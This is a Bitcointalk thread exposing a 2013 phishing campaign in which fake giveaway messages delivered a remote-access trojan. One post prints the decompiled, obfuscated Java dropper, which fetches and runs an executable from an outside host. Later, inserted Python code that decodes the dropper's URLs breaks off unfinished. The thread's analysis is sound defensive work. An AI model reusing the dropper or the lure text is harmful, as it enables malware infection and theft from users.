
Topic: Pishing scammer! legitnick! (Read 4809 times)

legendary
Activity: 1134
Merit: 1118
August 22, 2013, 03:40:39 PM
#70
This might be gravedigging, but I received an interesting PM from someone today.

Quote from: confidential, I don't spread names
I jokingly offered to sell my account for $3.50 to this obvious skid/scammer but then he offered me $50 for my account so I agreed to it and I have emails that verify this transaction. I wasn't aware that he would use my account maliciously.

I'm not sure how much help it would be but I can provide a wallet address that he was using and if I knew this is what he was up to I would have gotten more info on him.

I can verify that I am who I say I am by using my bitcoin-otc key.

There was no mention of this users name. No PMs before. I just got this PM out of the blue, and nothing else. With the $3.50 though, I instantly know who it is.

legitnick was offered $50 for his account and apparently had no idea of what the person would do. Maybe his account should be returned to him?
cp1
hero member
Activity: 616
Merit: 500
Stop using branwallets
July 08, 2013, 12:03:34 AM
#69
Sorry to hear that, just reformat :(
sr. member
Activity: 672
Merit: 250
July 07, 2013, 10:59:51 PM
#68
Anyone who fell for this needs to make absolutely sure they have wiped their hard drive and changed passwords.  Today the scammers bid over $300 on my eBay account, bought $300 worth of gift cards on Amazon for Hotmail accounts, spent about $35 on PayPal, and had my blockchain.info wallet sent to my email address.  Then they tried to initiate password resets on dwolla, coinbase, and bitinstant.

They did all of that over the course of about fifteen minutes.  The Obama alias is also watching the forums and has even posted in some of the current scam threads.

Chad
legendary
Activity: 1134
Merit: 1118
July 07, 2013, 03:48:48 PM
#67
DarkComet RAT

...I've figured out the critical mass.
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 07, 2013, 04:28:11 AM
#66
This is nothing that a good sandbox can't fix.  It's hard to believe anyone on bitcointalkscam.org would fall for this. How many times does the frying pan need to hit you in the head before you duck?

+2
legendary
Activity: 2156
Merit: 1393
You lead and I'll watch you walk away.
July 07, 2013, 04:26:05 AM
#65
This is nothing that a good sandbox can't fix.  It's hard to believe anyone on bitcointalkscam.org would fall for this. How many times does the frying pan need to hit you in the head before you duck?
hero member
Activity: 899
Merit: 1002
July 06, 2013, 11:27:35 PM
#64
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.

Not entirely pointless. Account sales will decrease if there wasn't open threads "BUYING BITCOINTALK FORUM ACCOUNTS"! People will have to visit another forum in order to bst accounts.

What's the difference it will still happen regardless. They will just manipulate google search results so searching for 'bitcointalk' shows SELL UR ACCOUNT HERE on the first page or advertise on reddit/twitter and other social media.

Also install Common Sense 1.0 and don't click on a PM that says "Download this mtgox.exe winning self-archiving wallet!".

Mods could also use SMF plugins to look for heavy PM traffic and hellban that user, so they keep sending PMs but they aren't actually being sent, letting the bot run itself out and waste time doing nothing. Or DOS them with timeouts and errors http://www.simplemachines.org/community/index.php?topic=471231.0
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 06, 2013, 05:00:06 PM
#63
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

for the love of god, this!
legendary
Activity: 1134
Merit: 1118
July 06, 2013, 04:58:48 PM
#62
tl;dr

Did http://bitcoin-otc.com/viewratingdetail.php?nick=legitnick1 (legitnick before he lost his original key) sell his forum account, or is it actually him scamming on his own account? I did a FTF cash trade with him, http://www.linkedin.com/pub/nick-legotte/64/507/92

Obama owns legitnick. He sold his account...or was hacked.
legendary
Activity: 3038
Merit: 1032
RIP Mommy
July 06, 2013, 04:57:52 PM
#61
tl;dr

Did http://bitcoin-otc.com/viewratingdetail.php?nick=legitnick1 (legitnick before he lost his original key) sell his forum account, or is it actually him scamming on his own account? I did a FTF cash trade with him, http://www.linkedin.com/pub/nick-legotte/64/507/92
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 08:33:24 PM
#59
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.

Not entirely pointless. Account sales will decrease if there wasn't open threads "BUYING BITCOINTALK FORUM ACCOUNTS"! People will have to visit another forum in order to bst accounts.
legendary
Activity: 1652
Merit: 1128
July 04, 2013, 08:11:17 PM
#58
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.

Would be pointless, there's no way to actually enforce it.
hero member
Activity: 490
Merit: 500
July 04, 2013, 07:47:00 PM
#57
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all :(

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antivirus, but its so fucking annoying with its alerts and messages. one last thing, i feel like its my duty to advise everyone here to download Malware Bytes Anti Rootkit. its a free rootkit remove tool and it works. even if a virus blocks it from running, it will automatically restart your computer and run as soon as dos is booted. really handy for dealing with viruses/malware/rootkits.

True, you're right, it does have a ridiculous amount of popups.  I've tried to turn them off but couldn't figure out how.

As far as the scam...well, I suppose a giveaway by a guy named "legitnick" should have been a giveaway.  After all, if you have to go the trouble of claiming that you're legit, you probably aren't.  (See also Bernie Madoff for other instances of people doing exactly what their name implies.)
sr. member
Activity: 672
Merit: 250
July 04, 2013, 07:02:28 PM
#56
On my system the downloaded file opened up access to DarkComet RAT.  They used that to remote onto my system to try installing other software.  In the details of the file they downloaded, Dell Datasafe was mentioned.  It looks like a service similar to Dropbox.

Chad
hero member
Activity: 756
Merit: 522
July 04, 2013, 06:50:21 PM
#55
Mods should forbid account trading.

And just how are they going to police that

No, mods should just get rid of the self-mod thread already. Delenda est!
hero member
Activity: 770
Merit: 500
July 04, 2013, 05:19:53 PM
#54
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (likely another legitnick sockpuppet used in his "award" pm's), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Mods should forbid account trading.
full member
Activity: 173
Merit: 100
July 04, 2013, 05:17:04 PM
#53
I cant believe someone fell for that

this times like, 5 billion. people these days

***USERNAME r3wd (who posted in this thread) might be a legitnick sockpuppet*****

In the thread below, username "obama" (used in his "award" pm's, and likely a legitnick sockpuppet), offers to buy r3wt's account:

https://bitcointalksearch.org/topic/m.2591196

Now, r3wd is posting in these scam-alert threads, acting like he's appalled at such an act.  
full member
Activity: 173
Merit: 100
July 04, 2013, 04:57:47 PM
#52
He was hacked with the last wave.

Legitnick was 100% NOT hacked.  Proof:

the username "Obama" is one that he lists in every one of his phishing award PM's.  

Interestingly, in this thread, the username "obama" (likely operated by legitnick) made a post asking to buy other user names.  legitnick "responded" to obama to offer his username for $3.50 - likely to try to get others to do the same:  

https://bitcointalksearch.org/topic/m.2525299

This was long premeditated, folks.

He also had hundreds of posts in only a few weeks, to raise his "activity" rating.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 04:56:11 PM
#51
I always just in case it is legit. Even though I know how stupid it is. I knew it was going to end up like this. As soon as I saw the link I was like....not again. I wouldn't be surprised if it's the same guy as last time. I would search the old thread which was so successful last time. I can't remember the name or the person who did it. I don't know if it got deleted either. Otherwise I would expect to see legitnick posted on there claiming he had received his Bitcoin.

This isn't the last time this is going to happen either. It's going to happen again and again. People will still fall for it. I have not fallen for this or the last one. It's just stupid. You don't know the person. The person claimed no links would be involved and the Bitcoin would just be sent to your address. Yet, he went against his word. That raises another flag. I know when people look at the message and think "OMG" and want to rush to receive their Bitcoins and that's when most people don't think about it just do it. Then say later how did I fall for that. Well, I hope in future people will not fall for this.

It was anyroll last time
staff
Activity: 3290
Merit: 4114
July 04, 2013, 04:51:18 PM
#50
I always just in case it is legit. Even though I know how stupid it is. I knew it was going to end up like this. As soon as I saw the link I was like....not again. I wouldn't be surprised if it's the same guy as last time. I would search the old thread which was so successful last time. I can't remember the name or the person who did it. I don't know if it got deleted either. Otherwise I would expect to see legitnick posted on there claiming he had received his Bitcoin.

This isn't the last time this is going to happen either. It's going to happen again and again. People will still fall for it. I have not fallen for this or the last one. It's just stupid. You don't know the person. The person claimed no links would be involved and the Bitcoin would just be sent to your address. Yet, he went against his word. That raises another flag. I know when people look at the message and think "OMG" and want to rush to receive their Bitcoins and that's when most people don't think about it just do it. Then say later how did I fall for that. Well, I hope in future people will not fall for this.
sr. member
Activity: 672
Merit: 250
July 04, 2013, 04:41:08 PM
#49
I'm ashamed to say I fell for it.  I thought it was a wallet file and accidentally clicked on it while I was trying to import the keys.  I deleted the file and scanned my computer for problems.  I thought I removed the problem and went to bed.  I woke up about twenty minutes ago and saw my mouse moving by itself.  Someone had messed with my firewall settings, opened up bitcoin-qt, and had just downloaded a file called _DVSoy.exe from plasmon.ghost.ru.

Chad
legendary
Activity: 1134
Merit: 1118
July 04, 2013, 04:23:07 PM
#48
Funny because if you click the quote, it brings you to a random thread - he probably grabbed a random ID to make it seem legit. That instantly rings warning bells, why can't people click a quote >_>

I received this PM too.
newbie
Activity: 44
Merit: 0
July 04, 2013, 11:26:47 AM
#47
The only free thing that posting a message on an internet discussion will get you nowadays is a shoutout on a youtube video, for people expecting anything more than a scam. lold
cp1
hero member
Activity: 616
Merit: 500
Stop using branwallets
July 04, 2013, 10:41:56 AM
#46
I got pmed a password and a .zip file.  Not going to touch that!
legendary
Activity: 2008
Merit: 1028
Fill Your Barrel with Bitcoins!
July 04, 2013, 10:25:17 AM
#45
looks like he's switching it up a bit.
member
Activity: 98
Merit: 10
July 04, 2013, 09:25:36 AM
#44
Winners are as follows:
Kiders
Tranzistor
yayayo
AMDFun
humanizator
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a private key loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I've uploaded the key, password to open .com file is legitnickiscool

Private Key Download

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!


Lol
hero member
Activity: 756
Merit: 522
July 04, 2013, 07:41:02 AM
#43
Incredible how successful this was.

I remember the good old days when the average Internet age of the Bitcoin troop was well over one year. Seems you people just finally got cable installed last week?
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 05:37:23 AM
#42
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all :(

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antivirus, but its so fucking annoying with its alerts and messages.

I use Avast but before that Avira Antivir
And that scares the cra!!p out of you
Normal surfing then Bleep
Then another virus
Bleep Bleep Bleep on full speakers lol
(But its good software too and free)
Nod32 for Overkill

Note to self always demand of John his GPG signature hehe or send him a Goat
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 04, 2013, 05:36:11 AM
#41
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all :(

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
yup, avast is good antivirus, but its so fucking annoying with its alerts and messages. one last thing, i feel like its my duty to advise everyone here to download Malware Bytes Anti Rootkit. its a free rootkit remove tool and it works. even if a virus blocks it from running, it will automatically restart your computer and run as soon as dos is booted. really handy for dealing with viruses/malware/rootkits.
hero member
Activity: 490
Merit: 500
July 04, 2013, 05:34:17 AM
#40
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all :(

For future reference, I recommend Avast as an antivirus scanner.  It caught what he was trying to pass on, though I feel dumb for falling for it, at least my antivirus scanner protected me from it.  It's an excellent antivirus scanner, and it's free.
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 04, 2013, 05:09:23 AM
#39
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.

Yes he's banned, did it myself. Sent pms are still going to be there, that's why the feedback.

He coulda been compromised, sure is convenient timing though.

good point. maybe it was a really thought out scam attempt. gain everyones trust by offering a giveaway, then pm everyone declaring them a winner and steal as many wallets and btc as possible.
rme
hero member
Activity: 756
Merit: 504
July 04, 2013, 05:07:37 AM
#38
I think this is the result of allowing "account trading". Prove me wrong..
That is true, in the last 3 days, 4 users tried to scam me via private message.
I think they are sold accounts.
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 04, 2013, 05:06:43 AM
#37
I cant believe someone fell for that

this times like, 5 billion. people these days
hero member
Activity: 770
Merit: 500
July 04, 2013, 05:06:06 AM
#36
I think this is the result of allowing "account trading". Prove me wrong..
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 05:05:36 AM
#35
He was hacked with the last wave.
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
July 04, 2013, 05:05:25 AM
#34
If his account was hacked, he would have the time to register and warn everyone about it before raffle ends. If he got hacked while raffle went on, that would be too much to believe. Also view his recent forum activity.
legendary
Activity: 1652
Merit: 1128
July 04, 2013, 05:04:25 AM
#33
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.

Yes he's banned, did it myself. Sent pms are still going to be there, that's why the feedback.

He coulda been compromised, sure is convenient timing though.
full member
Activity: 224
Merit: 100
July 04, 2013, 04:59:15 AM
#32
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210
United States    San Francisco    AT&T Internet Services
 AS7132 SBIS-AS AS for SBIS-AS (registered Sep 13, 1996)

Wonder if that is where legitnick lives?  If it is then he really is the scammer.  Otherwise might just be his account was hacked.
full member
Activity: 224
Merit: 100
July 04, 2013, 04:57:58 AM
#31
Think I'm safe.  There was still a java process running, but I killed it.  When I went to Gox before that, I apparently had a stored cookie login so I didn't have to type in a password first time I went.  I've since made it so I need Google Auth to also log in to Gox, not just for withdrawals.

Not that it matters, since that password isn't used anywhere else and there's no funds in there since I quit using Gox a while ago.  :)
rme
hero member
Activity: 756
Merit: 504
July 04, 2013, 04:57:36 AM
#30
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210
United States    San Francisco    AT&T Internet Services
 AS7132 SBIS-AS AS for SBIS-AS (registered Sep 13, 1996)
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 04:56:30 AM
#29
Change your passwords..
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
July 04, 2013, 04:53:07 AM
#28
I cant believe someone fell for that
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 04:52:35 AM
#27
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210

Best change your passwords preferably on a different PC that you trust  ;)
Meanwhile get the software I mentioned and scan around to be sure there's no hidden lurkers :D
newbie
Activity: 42
Merit: 0
July 04, 2013, 04:48:39 AM
#26
Yes hes very bad scammer.. Very bad.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 04:45:59 AM
#25
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all :(

Well Malware and viruses require different detecting software
Recommend Spybot Search and Destroy and MalwareBytes Anti-Malware if you don't have them yet
Maybe even Web of Trust to block at access
Good old Spywareblaster helps too although it doesn't actively do anything just blocks sites
Hope you're fine

As for a linux box
Well I don't think it can execute lols
If you're worried ClamAv
http://en.wikipedia.org/wiki/Linux_malware#Viruses
legendary
Activity: 1672
Merit: 1010
July 04, 2013, 04:45:25 AM
#24
Quote
Winners are as follows:
Kuriboh
digit
PrintMule
willphase
Equilux
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!

this is the one i got, got my fingers crossed that my system is safe.  might run an antivirus over it later just to be sure.

also these "winners" appear to be common to all the pms posted here
Obama
juronimo
albert speer
hurro
bachelor

newbie
Activity: 42
Merit: 0
July 04, 2013, 04:38:52 AM
#23
Dont fall for this kind of stuff.
full member
Activity: 224
Merit: 100
July 04, 2013, 04:36:37 AM
#22
Well, this sucks.  Could have really used that .5 BTC.  :(

I didn't notice the link to begin with, usually do.  Maybe I'm safe? I did this on a linux box.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 04:20:27 AM
#21
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  URL Suspicious

Can anyone check this please?

Link has malware (Detected on 1)
https://www.virustotal.com/en/url/031e951e605a7ceaddde1c219cbb87dcf236c6fdb925ebb9e1d13c207d0bc121/analysis/
http://www.avgthreatlabs.com/sitereports/domain/rghost.net/

I don't know what the virus is seems to be detected on some virus scanners so try one of those
Worst case Rootkit deletion
Anyways assume infection for now best be safe than sorry not sure if its just on the page or if its installed on pc
Sorry for shotgun detectiving 
newbie
Activity: 42
Merit: 0
July 04, 2013, 04:16:04 AM
#20
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  http://pl.rghost.net/47200539?r=2862

Can anyone check this please?
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 04:10:53 AM
#19
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 04, 2013, 04:07:12 AM
#18
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 04:06:23 AM
#17
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.
legendary
Activity: 1652
Merit: 1128
July 04, 2013, 04:04:43 AM
#16
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
July 04, 2013, 04:00:16 AM
#15
Such a nice setup, and so lame execution.

That phishing link could be done much better.

I hope it was worth the trouble, there's plenty of other way to trash your account than this.
hero member
Activity: 490
Merit: 500
July 04, 2013, 03:40:38 AM
#14
I can confirm this as well.  Tried to download, but thankfully my virus scanner caught it as a virus so my computer didn't get infected.
rme
hero member
Activity: 756
Merit: 504
July 04, 2013, 03:31:25 AM
#13
Decompiled Java Applet:

Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.File;
import java.io.FileOutputStream;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.util.Random;

public class Java extends Applet
{
  public String Author = "Created-By-FoxxySoftware|Want more? Visit us at foxxysoftware.blogspot.com!";
  public String[] AAA = { "7-3A3-3T3-3A3-" + "3D3-3P3-3P3-3A1-", "7-3e3-3m3-3o3-3h3-3" + ".3-3r3-3e3-3s3-3u3-1", "7-3r3-3i3-3d3-3p3-3m3-3t3-3.3" + "-3o3-3i3-3.3-3a3-3v3-3a3-3j3-1" };
  public int BBB = 0;
  public String[] CCC = { "\\", "//", Long.toString(Math.abs(new Random().nextLong()), 36) };

  public void init() {
    try {
      for (String str1 : this.AAA) {
        this.AAA[this.BBB] = new StringBuffer(str1).reverse().toString().replaceAll("[".concat("0") + "-".concat("9") + "]", "").replaceAll("-", "");
        String str2 = null;
        if (this.BBB == 0) str2 = System.getenv(this.AAA[this.BBB]); else str2 = System.getProperty(this.AAA[this.BBB]);
        if ((str2 != null) && (new File(str2).exists()) && (new File(str2).canWrite()) && (new File(str2).canExecute()) && (new File(str2).canRead()) && (new File(str2).isDirectory())) {
          this.AAA[0] = str2;
          break;
        }
        this.BBB += 1;
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] == "7-3A3-3".concat("T3-3A3-").toString() + "3D3-3P3-".concat("3P3-3A1-")) {
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].endsWith(this.CCC[0])) {
        this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].substring(0, this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].length() - 1);
      }
      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].replaceAll((this.CCC[1] + this.CCC[1].concat("5").concat("$").concat("4")).replaceAll("[".concat("0") + "-".concat("9") + "]", "").toString(), "");
      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] + this.CCC[0] + this.CCC[0] + this.CCC[2].replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + ".exe");

      if (IFK(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString(), this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))], false, getAppletContext(), getDocumentBase()) == true)
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
  }

  public boolean IFK(String paramString1, String paramString2, boolean paramBoolean, AppletContext paramAppletContext, URL paramURL) {
    try {
      FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
      localFileOutputStream.getChannel().transferFrom(Channels.newChannel(new URL(paramString1).openStream()), 0L, 16777216L);
      localFileOutputStream.close();

      if (Runtime.getRuntime().exec(this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))]) != null) {
        new URL("1h3t3t3p3:3/3/3w3w3w3.3s3u3p3e3r3-3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + "1r3a3c3k3e3r3.3n3e3t3/3w7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "").concat(new StringBuilder().append("1t3f3/3c3a3l3l3b3a3c3k3=3g3e3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("1i3p3.3j3s3.3p3h3p3?3u3s7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).toString()).concat(new StringBuilder().append("1e3r3n3a3m3e3=7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("bongwater").append("&website=").toString()) + paramURL.toString().concat("&type=1&download=").concat(new StringBuilder().append(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString()).append("&").append("exploit=0").toString())).openStream();

        if (paramBoolean == true) {
          paramAppletContext.showDocument(new URL(""), "");
        }
      }
      else if (paramBoolean == true) {
        paramAppletContext.showDocument(new URL(""), "");
      }

      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    } catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    return true;
  }
}


VirusTotal scan of the executable that it tries to download:
https://www.virustotal.com/es/file/79dabdcac50bdb5219906cfee9e1dd12ddc67106cd34867c08cfe14c8561ac83/analysis/1372922774/
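Added example, not part of the thread or any poster's code: a static recovery of what the decompiled `IFK()` method hides behind digit padding, a reversed `StringBuffer` and `Integer.parseInt` arithmetic, with the recovered URLs printed defanged. The string literals are copied from the listing above; the function names are this example's own.

```python
import re
from urllib.parse import urlsplit

# String literals copied verbatim from the decompiled IFK() listing above.
PADDED = [
    "1h3t3t3p3:3/3/3w3w3w3.3s3u3p3e3r3-3t7",
    "1r3a3c3k3e3r3.3n3e3t3/3w7",
    "1t3f3/3c3a3l3l3b3a3c3k3=3g3e3t7",
    "1i3p3.3j3s3.3p3h3p3?3u3s7",
    "1e3r3n3a3m3e3=7",
]
REVERSED = "exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth"
EXIT_EXPR = ('Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5")'
             ' - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3")')

def strip_padding(lit):
    """Undo "...".replaceAll("[0-9]", ""): every digit is filler."""
    return re.sub(r"[0-9]", "", lit)

def unreverse(lit):
    """Undo new StringBuffer(lit).reverse().toString()."""
    return lit[::-1]

def fold_parseint(expr):
    """Constant-fold a +/- chain of Integer.parseInt("n") terms."""
    total = 0
    for sign, num in re.findall(r'([+-]?)\s*Integer\.parseInt\("(\d+)"\)', expr):
        total += -int(num) if sign == "-" else int(num)
    return total

def defang(url):
    """Render a recovered URL so it cannot be clicked or auto-linked."""
    parts = urlsplit(url)
    host = parts.netloc.replace(".", "[.]")
    rest = parts.path + ("?" + parts.query if parts.query else "")
    return f"{parts.scheme.replace('tt', 'xx')}://{host}{rest}"

def recover_indicators():
    # "bongwater" and "&website=" appear as plain literals in the listing.
    callback = "".join(strip_padding(p) for p in PADDED) + "bongwater&website="
    return {
        "callback": defang(callback),
        "payload": defang(unreverse(REVERSED)),
        "folded_constant": fold_parseint(EXIT_EXPR),  # exit code and AAA[] index
    }

if __name__ == "__main__":
    for name, value in recover_indicators().items():
        print(f"{name}: {value}")
```

The folded constant shows that every `System.exit(...)` in the listing exits with the same value and that the `exec` call runs the first entry of `AAA`.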
full member
Activity: 121
Merit: 100
July 04, 2013, 03:18:52 AM
#12
Yep, I got the same PM a little while ago. Noticed the jacked up htpps and then checked the link and noticed it was mtqox and not mtgox. I never clicked on the link. Did a little check on Google and saw the java.jar and decided to not even attempt to go to the site.
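Added example, not from the thread: the two checks this poster did by eye (the odd scheme in the visible text, and the real target being one letter off from the exchange's name), written as a link check a mail or PM filter could run. The `href` host `mtqox.example` is constructed, since the thread only says the link used "mtqox with a q"; the function names and the `TRUSTED` list are this example's own.

```python
from urllib.parse import urlsplit

TRUSTED = {"mtgox"}  # brand labels to protect (assumption: one-entry allow-list)

# Visible text as quoted in the PM; the href is a constructed stand-in.
SHOWN = "htpps://mtgox.com/redeem-code.htm/"
HREF = "http://mtqox.example/redeem-code.htm/"

def edit_distance(a, b):
    """Levenshtein distance using two rows of the DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def brand_label(url):
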